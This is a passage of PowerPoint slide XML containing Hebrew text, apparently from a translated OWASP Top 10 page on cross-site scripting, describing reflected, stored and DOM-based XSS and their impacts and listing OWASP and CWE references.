                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: היישום או ממשק הפיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) מכיל מידע בלתי מאומת כחלק מפלט ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. מתקפה מוצלחת תאפשר לתוקף להריץ קוד זדוני מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בדפדפן הקורבן. לרוב המשתמש יידרש ללחוץ על קישור זדוני אשר יפנה אותו לדפים בשליטת התוקף, כגון אתרים זדוניים דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>watering hole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, פרסומות וכדומה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מתקפה מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: היישום או ממשק הפיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) מאחסנים קלט בלתי מאומת מהמשתמש, אשר נצפה בשלב מאוחר יותר ע"י משתמש אחר או ע"י מנהל המערכת. מתקפה מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לרוב נחשבת כמתקפה ברמת סיכון גבוהה או קריטית.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מתקפה מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: מסגרות עבודה של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, יישומים של עמוד-אחד, וממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) אשר מכילים בצורה דינאמית מידע בשליטת התוקף עם הפניה לעמודים הפגיעים למתקפה מסוג זה. באופן אידיאלי, היישום לא ישלח מידע בשליטת התוקף לממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) בלתי מאובטחים מבוססי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>לרוב, מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מכילות מזהה שיחה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) גנובים, חשבונות אשר השתלטו עליהם, שיטות לעקוף הזדהות חזקה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MFA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), החלפה של רכיבי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (כגון עמודי הזדהות המשתמשים כסוסים טרויאניים), מתקפות כנגד דפדפן המשתמש דוגמת היכולת להוריד תוכנות זדוניות, תיעוד הקלדה, ומתקפות נוספות בצד הלקוח.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Encode Data</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4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Validate Data</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5"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V5</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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Reflected XSS</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Stored XSS</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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for DOM XSS</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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XSS Prevention</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10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: DOM based XSS Prevention</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11"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XSS Filter Evasion</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12"/>
              </a:rPr>
              <a:t>OWASP Java Encoder Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="he-IL" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE-79: Improper neutralization of user supplied input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>: Client-side template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3114190"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מניעת מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
